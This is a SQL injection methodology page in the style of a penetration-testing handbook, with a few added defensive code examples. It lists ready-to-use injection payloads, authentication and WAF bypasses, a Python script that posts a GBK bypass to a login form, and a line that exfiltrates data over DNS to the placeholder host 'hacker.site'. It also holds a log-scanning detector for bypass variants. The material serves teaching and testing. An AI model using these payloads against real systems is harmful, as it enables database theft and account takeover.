# SQL Injection

{{#include ../../banners/hacktricks-training.md}}

## What is SQL injection?

An **SQL injection** is a security flaw that allows attackers to **interfere with the database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't be able to access, including other users' information or any data the application can reach. Such actions may result in permanent changes to the application's functionality or content, or even compromise of the server or denial of service.

## Entry point detection

When a site appears **vulnerable to SQL injection (SQLi)** because of unusual server responses to SQLi-related inputs, the **first step** is to understand how to **inject data into the query without breaking it**. This requires identifying how to **escape from the current context** effectively. These are some useful examples:

```
[Nothing]
'
"
`
')
")
`)
'))
"))
`))
```

Then, you need to know how to **fix the query so that there are no errors**. To fix the query you can **input** data so that the **previous query accepts the new data**, or you can just **input** your data and **add a comment symbol at the end**.

_Note that if you can see error messages, or you can spot differences between when a query works and when it doesn't, this phase will be easier._

### **Comments**

```sql
MySQL
#comment
-- comment [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments
```

### Confirming with logical operations

A reliable method to confirm an SQL injection vulnerability is to execute a **logical operation** and observe the expected outcome. For instance, a GET parameter such as `?username=Peter` that yields identical content when modified to `?username=Peter' or '1'='1` indicates an SQL injection vulnerability.
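What the tautology probe above does to a query built by string concatenation, next to the parameterized form that is unaffected, as an added Python/sqlite3 example that is not part of the original page; the `users` table and its rows are constructed for the demo, and it also covers an arithmetic probe of the same kind on a numeric id.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample table (not from the original page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "Peter"), (2, "alice"), (3, "bob")])
    return conn

def by_username_concat(conn, username: str):
    # Vulnerable: the parameter value becomes part of the SQL text, so a quote
    # in it closes the literal and the rest is parsed as SQL.
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def by_username_param(conn, username: str):
    # Hardened: the value is bound by the driver and is only ever compared as data.
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def by_id_concat(conn, raw_id: str):
    # Vulnerable numeric context: no quotes at all, so "2-1" is evaluated by the DB.
    return conn.execute("SELECT id, username FROM users WHERE id = " + raw_id).fetchall()

def by_id_param(conn, raw_id: str):
    # Hardened: "2-1" is bound as text and never evaluated; validating it as an
    # integer before the query would reject the probe even earlier.
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (raw_id,)).fetchall()

def demo() -> dict:
    conn = make_db()
    tautology = "Peter' or '1'='1"    # the probe from the text
    return {
        "baseline":         by_username_concat(conn, "Peter"),
        "concat_tautology": by_username_concat(conn, tautology),
        "param_tautology":  by_username_param(conn, tautology),
        "concat_arith":     by_id_concat(conn, "2-1"),
        "param_arith":      by_id_param(conn, "2-1"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:17} -> {rows}")
```

The concatenated tautology returns every row with `Peter` first, which is why an application that shows one record looks unchanged; the bound version returns nothing for either probe.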
Similarly, the use of **mathematical operations** serves as an effective confirmation technique. For example, if accessing `?id=1` and `?id=2-1` produces the same result, that indicates SQL injection.

Examples demonstrating confirmation by logical operation:

```
page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
```

This word list was created to try to **confirm SQL injections** in the proposed way:

{% file src="../../images/sqli-logic.txt" %}

### Confirming with Timing

In some cases you **won't notice any change** on the page you are testing. Therefore, a good way to **discover blind SQL injections** is to make the DB perform actions that have an **impact on the time** the page needs to load.\
So we are going to append to the SQL query an operation that will take a lot of time to complete:

```
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```

In some cases the **sleep functions won't be allowed**. Then, instead of using those functions you could make the query **perform complex operations** that take several seconds. _Examples of these techniques are going to be discussed separately for each technology (if any)_.

### Identifying Back-end

The best way to identify the back-end is to try to execute functions specific to the different back-ends.
You can use the _**sleep**_ **functions** of the previous section or these (table from [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)):

```
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```

Also, if you have access to the output of the query, you could make it **print the version of the database**.

> [!NOTE]
> In the following sections we are going to discuss different techniques to exploit different kinds of SQL injection. We are going to use MySQL as an example.

### Identifying with PortSwigger

{{#ref}}
https://portswigger.net/web-security/sql-injection/cheat-sheet
{{#endref}}

## Exploiting Union Based

### Detecting number of columns

If you can see the output of the query, this is the best way to exploit it.\
First of all, we need to find out the **number** of **columns** the **initial request** returns.
This is because **both queries must return the same number of columns**.\
Two methods are typically used for this purpose:

#### Order/Group by

To determine the number of columns in a query, incrementally adjust the number used in the **ORDER BY** or **GROUP BY** clause until a false response is received. Despite the distinct functions of **GROUP BY** and **ORDER BY** within SQL, both can be used identically to determine the query's column count.

```sql
1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True
1' ORDER BY 4--+    #False - Query is only using 3 columns
                        #-1' UNION SELECT 1,2,3--+    True
```

```sql
1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True
1' GROUP BY 4--+    #False - Query is only using 3 columns
                        #-1' UNION SELECT 1,2,3--+    True
```

#### UNION SELECT

Select more and more null values until the query is correct:

```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
```

_You should use `null` values, as in some cases the type of the columns on both sides of the query must be the same and null is valid in every case._

### Extract database names, table names and column names

In the following examples we are going to retrieve the names of all the databases, the table names of a database, and the column names of a table:

```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```

_There is a different way to discover this data on every different database, but the methodology is always the same._

## Exploiting Hidden Union Based

When the output of a query is visible but a union-based injection seems unachievable, it signals the presence of a **hidden union-based injection**. This scenario often leads to a blind injection situation. To transform a blind injection into a union-based one, the query executed on the back-end needs to be identified.

This can be accomplished with blind injection techniques alongside the default tables specific to your target Database Management System (DBMS). To understand these default tables, consult the documentation of the target DBMS.

Once the query has been extracted, your payload needs to be tailored to safely close the original query. Then, a union query is appended to your payload, allowing exploitation of the newly accessible union-based injection.

For more comprehensive insights, refer to the complete article available at [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f).

## Exploiting Error based

If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make these error messages **exfiltrate** data from the database.\
Following a similar flow to the Union Based exploitation you could manage to dump the DB.

```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```

## Exploiting Blind SQLi

In this case you cannot see the results of the query or the errors, but you can **distinguish** when the query **returns** a **true** or a **false** response because there is different content on the page.\
In this case, you can abuse that behaviour to dump the database char by char:

```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```

## Exploiting Error Blind SQLi

This is the **same case as before** but instead of distinguishing between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not (maybe because the HTTP server crashes).
Therefore, in this case you can force an SQL error each time you guess the char correctly:

```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```

## Exploiting Time Based SQLi

In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But you can make the page **take longer to load** if the guessed character is correct. We have already seen this technique in use before in order to [confirm a SQLi vulnerability](./#confirming-with-timing).

```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```

## Stacked Queries

You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay.

**Oracle** doesn't support **stacked queries.** **MySQL, Microsoft** and **PostgreSQL** support them: `QUERY-1-HERE; QUERY-2-HERE`

## Out of band Exploitation

If **no other** exploitation method **worked**, you may try to make the **database exfiltrate** the info to an **external host** controlled by you. For example, via DNS queries:

```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

### Out of band data exfiltration via XXE

```sql
a' UNION SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- -
```

## Automated Exploitation

Check the [SQLMap Cheatsheet](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).

## Tech specific info

We have already discussed all the ways to exploit a SQL Injection vulnerability.
Find some more tricks regarding database technologies in this book:

- [MS Access](ms-access-sql-injection.md)
- [MSSQL](mssql-injection.md)
- [MySQL](mysql-injection/)
- [Oracle](oracle-injection.md)
- [PostgreSQL](postgresql-injection/)

Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

## Authentication bypass

List to try to bypass the login functionality:

{{#ref}}
../login-bypass/sql-login-bypass.md
{{#endref}}

### Raw hash authentication Bypass

```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```

This query shows a vulnerability when MD5 is used with `true` for raw output in authentication checks, making the system susceptible to SQL injection. Attackers can exploit this by crafting inputs that, when hashed, produce unexpected SQL command parts, leading to unauthorized access.

```sql
md5("ffifdyop", true) = 'or'6�]��!r,��b�
sha1("3fDf ", true) = Q�u'='�@�[�t�-	o��_-!
```

### Injected hash authentication Bypass

```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```

**Recommended list**:

You should use as username each line of the list and as password always: _**Pass1234.**_\
_(These payloads are also included in the big list mentioned at the beginning of this section)_

{% file src="../../images/sqli-hashbypass.txt" %}

### GBK Authentication Bypass

IF ' is being escaped you can use %A8%27, and when ' gets escaped it will be created: 0xA80x5c0x27 (_╘'_)

```sql
%A8%27 OR 1=1;--
2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
```

Python script:

```python
import requests

url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
# Send the raw byte 0xbf followed by a quote (bytes, so it is not re-encoded as UTF-8):
# the escaping backslash gets swallowed into a GBK multibyte character
datas = {"login": b"\xbf'" + b"OR 1=1 #", "password": "test"}
r = requests.post(url, data=datas, cookies=cookies, headers={'Referer': url})
print(r.text)
```

### Polyglot injection (multicontext)

```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```

## Insert Statement

### Modify password of existing object/user

To do so you should try to **create a new object named as the "master object"** (probably **admin** in case of users) modifying something:

- Create a user named: **AdMIn** (uppercase & lowercase letters)
- Create a user named: **admin=**
- **SQL Truncation Attack** (when there is some kind of **length limit** in the username or email) --> Create a user with name: **admin \[a lot of spaces] a**

#### SQL Truncation Attack

If the database is vulnerable and the max number of chars for a username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces] a_" and any password.

The database will **check** if the introduced **username** **exists** inside the database.
If it **doesn't**, it will cut the **username** to the **max allowed number of chars** (in this case to: "_admin \[25 spaces]_") and then it will **automatically remove all the spaces at the end, updating** inside the database the user "**admin**" with the **new password** (some error could appear, but that doesn't mean this hasn't worked).

More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)

_Note: This attack will no longer work as described above in the latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the field's length will result in an error, and the insertion will fail. For more information about this check:_ [_https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation_](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)

### MySQL Insert time based checking

Add as many `','',''` as you consider necessary to exit the VALUES statement. If a delay is executed, you have a SQL injection.

```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```

### ON DUPLICATE KEY UPDATE

The `ON DUPLICATE KEY UPDATE` clause in MySQL is used to specify the action the database takes when an attempt is made to insert a row that would result in a duplicate value in a UNIQUE index or PRIMARY KEY. The following example demonstrates how this feature can be abused to modify the password of an administrator account:

Example Payload Injection:

An injection payload might be crafted as follows, where two rows are attempted to be inserted into the `users` table.
The first row is a decoy, and the second row targets an existing administrator's email with the intention of updating the password:

```sql
INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
```

Here's how it works:

- The query attempts to insert two rows: one for `generic_user@example.com` and another for `admin_generic@example.com`.
- If the row for `admin_generic@example.com` already exists, the `ON DUPLICATE KEY UPDATE` clause triggers, instructing MySQL to update the `password` field of the existing row to "bcrypt_hash_of_newpassword".
- Consequently, authentication can then be attempted using `admin_generic@example.com` with the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" represents the bcrypt hash of the new password, which should be replaced with the actual hash of the desired password).

### Extract information

#### Creating 2 accounts at the same time

When trying to create a new user, a username, a password and an email are needed:

```
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
```

#### Using decimal or hexadecimal

With this technique you can extract information creating only 1 account. It is important to note that you don't need to comment anything.
Using **hex2dec** and **substr**:

```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

To get the text you can use:

```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```

Using **hex** and **replace** (and **substr**):

```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

## Routed SQL injection

Routed SQL injection is a situation where the injectable query is not the one that produces output; instead, the output of the injectable query feeds the query that produces output.
([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))

Example:

```
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```

## WAF Bypass

[Initial bypasses from here](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)

### No spaces bypass

No Space (%20) - bypass using whitespace alternatives

```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```

No Whitespace - bypass using comments

```sql
?id=1/*comment*/and/**/1=1/**/--
```

No Whitespace - bypass using parentheses

```sql
?id=(1)and(1)=(1)--
```

### No commas bypass

No Comma - bypass using OFFSET, FROM and JOIN

```
LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```

### Generic Bypasses

Blacklist using keywords - bypass using uppercase/lowercase

```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```

Blacklist using keywords case insensitive - bypass using an equivalent operator

```
AND   -> && -> %26%26
OR    -> || -> %7C%7C
=     -> LIKE,REGEXP,RLIKE, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
```

### Scientific Notation WAF bypass

You can find a more in-depth explanation of this trick in the [gosecure blog](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/).\
Basically you can use scientific notation in unexpected ways so that the WAF does not recognise the query:

```
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
```

### Bypass Column Names Restriction

First of all, notice that if the **original query and the table from which you want to extract the flag have the same number of columns** you can just do: `0 UNION SELECT * FROM flag`

It's possible to **access the third column of a table without using its name** with a query like the following: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, so in a SQL injection this would look like:

```sql
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
```

Or using a **comma bypass**:

```sql
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
```

This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)

### WAF bypass suggester tools

{{#ref}}
https://github.com/m4ll0k/Atlas
{{#endref}}

## Other Guides

- [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

## Brute-Force Detection List

{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
{{#endref}}

{{#include ../../banners/hacktricks-training.md}}
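Why the raw-digest comparison in the "Raw hash authentication Bypass" section is injectable, and how binding a parameter removes it, as an added Python example that is not code from the original page; the `admin` table, its two users and their passwords are constructed for the demo, and sqlite3 stands in for the MySQL back end.

```python
import hashlib
import sqlite3

def raw_digest_as_sql_text(algorithm: str, password: str) -> str:
    """What PHP's md5($p, true) / sha1($p, true) contributes to the query text:
    the binary digest, decoded byte for byte (latin-1) as the DB parser sees it."""
    return hashlib.new(algorithm, password.encode()).digest().decode("latin-1")

def digest_breaks_string_literal(algorithm: str, password: str) -> bool:
    """True when the raw digest contains a single quote, which terminates the SQL literal."""
    return "'" in raw_digest_as_sql_text(algorithm, password)

def make_db() -> sqlite3.Connection:
    # Constructed sample table (not from the original page); stores hex digests.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?)", [
        ("root", hashlib.md5(b"constructed-root-pw").hexdigest()),
        ("ops", hashlib.md5(b"constructed-ops-pw").hexdigest()),
    ])
    return conn

def matching_rows_concat(conn, password: str) -> int:
    # Vulnerable pattern from the page: the raw digest is concatenated into the query.
    # For "ffifdyop" the text becomes  pass = ''or'6...'  and the OR branch is truthy.
    sql = "SELECT * FROM admin WHERE pass = '" + raw_digest_as_sql_text("md5", password) + "'"
    return len(conn.execute(sql).fetchall())

def matching_rows_param(conn, password: str) -> int:
    # Hardened: the digest is bound as a parameter, so no byte of it is parsed as SQL.
    # Binding fixes the injection; unsalted MD5 for password storage is a separate weakness.
    hexd = hashlib.md5(password.encode()).hexdigest()
    return len(conn.execute("SELECT * FROM admin WHERE pass = ?", (hexd,)).fetchall())

if __name__ == "__main__":
    conn = make_db()
    print("digest contains quote:", digest_breaks_string_literal("md5", "ffifdyop"))
    print("rows via concat      :", matching_rows_concat(conn, "ffifdyop"))
    print("rows via parameter   :", matching_rows_param(conn, "ffifdyop"))
```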
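How a detection rule can be made robust against the whitespace, comment, case and operator variants listed under "WAF Bypass", as an added Python example that is not part of the original page: the request lines are constructed here, and the point is that normalising before matching catches every variant a literal `and 1=1` filter misses.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log request lines (not from the original page). Lines 1-6 use the
# whitespace, comment, case, parenthesis and operator variants from the WAF Bypass section.
SAMPLE_LOG = [
    "GET /item.php?id=1 HTTP/1.1",
    "GET /item.php?id=1%09and%091=1%09-- HTTP/1.1",
    "GET /item.php?id=1/*comment*/and/**/1=1/**/-- HTTP/1.1",
    "GET /item.php?id=1%20AnD%201=1%23 HTTP/1.1",
    "GET /item.php?id=1%A0aNd%A01=1%A0-- HTTP/1.1",
    "GET /item.php?id=(1)and(1)=(1)-- HTTP/1.1",
    "GET /item.php?id=1%26%261=1-- HTTP/1.1",
    "GET /search.php?q=band%20and%20orchestra HTTP/1.1",
]

# Bytes MySQL treats as whitespace that a %20-only filter misses: \t \n \v \f \r and 0xA0.
WS_ALTERNATIVES = b"\t\n\x0b\x0c\r\xa0"


def normalize(query: str) -> str:
    """Reduce a raw query string to a canonical form before pattern matching."""
    raw = unquote_to_bytes(query)                 # %09, %A0, %26 ... become single bytes
    raw = re.sub(rb"/\*.*?\*/", b" ", raw)        # /**/ comments act as separators
    for ch in WS_ALTERNATIVES:
        raw = raw.replace(bytes([ch]), b" ")
    raw = raw.replace(b"&&", b" and ").replace(b"||", b" or ")   # equivalent operators
    raw = re.sub(rb"\(\s*([0-9]+|'[^']*')\s*\)", rb" \1 ", raw)  # (1) -> 1
    raw = raw.replace(b"=", b" = ")
    text = raw.decode("latin-1").lower()          # case folding defeats AnD / aNd
    return re.sub(r"\s+", " ", text).strip()


# "and 1 = 1", "or '1' = '1'" and similar tautologies after normalisation.
TAUTOLOGY = re.compile(r"\b(and|or) (\d+|'[^']*') = (\d+|'[^']*')")


def flag_request(line: str) -> bool:
    """True when the request's query string contains a normalised tautology."""
    parts = line.split(" ")
    if len(parts) < 2 or "?" not in parts[1]:
        return False
    return TAUTOLOGY.search(normalize(parts[1].split("?", 1)[1])) is not None


def scan(lines):
    """Return the request lines that should be reviewed."""
    return [line for line in lines if flag_request(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

The benign `band and orchestra` line is not flagged because the rule anchors on a literal on both sides of `=`, not on the bare keyword.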